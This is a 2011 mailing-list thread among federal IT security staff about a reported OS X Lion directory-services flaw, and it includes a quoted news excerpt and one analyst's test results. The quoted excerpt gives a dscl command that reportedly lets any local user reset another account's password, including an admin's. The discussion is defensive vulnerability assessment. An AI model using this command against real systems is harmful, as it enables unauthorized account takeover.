Re: [Fed-Talk] Lion password weakness
Re: [Fed-Talk] Lion password weakness
- Subject: Re: [Fed-Talk] Lion password weakness
- From: "Blackmon Jerry (Contractor)" <email@hidden>
- Date: Tue, 20 Sep 2011 13:44:29 -0400
- Acceptlanguage: en-US
- Thread-topic: [Fed-Talk] Lion password weakness
http://arstechnica.com/apple/news/2011/09/lion-directory-services-flaw-makes-cracking-changing-passwords-easier.ars?utm_source=rss&utm_medium=rss&utm_campaign=rss
---
Jerry Blackmon <email@hidden>
Engraving Support: Mac Specialist
Senior Systems Administrator, OITO
"The pessimist complains about the wind; the optimist expects it to change. The realist adjusts the sails." -- William Arthur Ward
From: "Link, Peter R." <email@hidden<mailto:email@hidden>>
Date: Tue, 20 Sep 2011 12:35:10 -0400
To: Todd Heberlein <email@hidden<mailto:email@hidden>>
Cc: "email@hidden<mailto:email@hidden>" <email@hidden<mailto:email@hidden>>
Subject: Re: [Fed-Talk] Lion password weakness
I tried this on the latest Lion beta (I know, NDA) and I could only change the current user's login password (dscl doesn't change the keychain password using this command). I tried an admin account as well as another non-admin account and it asks for the current password before proceeding. People talking about getting network access still have to log onto the computer using an account unless the person has left their Mac wide open. I am currently viewing this threat as one of those hypothetical threats that need all sorts of physical access as well as a poorly configured system to work.
As far as it changing the logged in user's password without asking for the current password, that really doesn't bother me that much. Of course, I have FV2 running with a firmware password set so getting around the boot sequence is much harder.
I'm still trying to figure out where the use of /Search/Users/username as the user path comes in. It appears this is an OpenDirectory search path. When using -passwd, you have to specify the full pathname not just the user name (man dscl). The dscl man page doesn't include this syntax. Of course the manpage included with Lion is dated 2003 so this change might have been included recently.
(I have Lion running on a test system, not a production system.)
On Sep 20, 2011, at 9:12 AM, Todd Heberlein wrote:
I have not confirmed this yet.
OS X Lion passwords can be changed by any local user
http://reviews.cnet.com/8301-13727_7-20108261-263/os-x-lion-passwords-can-be-changed-by-any-local-user/?part=rss&subj=cnet&tag=title
In Lion the permissions for the user's shadow files are still restrictive and prevent tampering; however, the need for direct access can be bypassed in because the system holds the password hashes in the system's directory services, which any user can look up. As a result, the hashes can be extracted without needing to supply admin privileges, and then be run through various hacking tools and scripts to recover the user's password.
In addition to being able to extract the password hashes for a user, any user can also directly change another user's password, including those of system admins, merely by supplying the following command in the Terminal (substituting USERNAME for the short name of the target account):
dscl localhost -passwd /Search/Users/USERNAME
When run, this command will appear to give an error, but if you enter the same new password at all prompts then the target account's password will be changed. This is particularly notable, because once an admin's password is changed, the hacker can log in as that the admin account and have full access to the system.
_______________________________________________
Do not post admin requests to the list. They will be ignored.
Fed-talk mailing list (email@hidden<mailto:email@hidden>)
Help/Unsubscribe/Update your Subscription:
This email sent to email@hidden<mailto:email@hidden>
Peter Link
Cyber Security Analyst
Cyber Security Program
Lawrence Livermore National Laboratory
PO Box 808, L-315
Livermore, CA 94550
email@hidden<mailto:email@hidden>
_______________________________________________
Do not post admin requests to the list. They will be ignored.
Fed-talk mailing list (email@hidden)
Help/Unsubscribe/Update your Subscription:
This email sent to email@hidden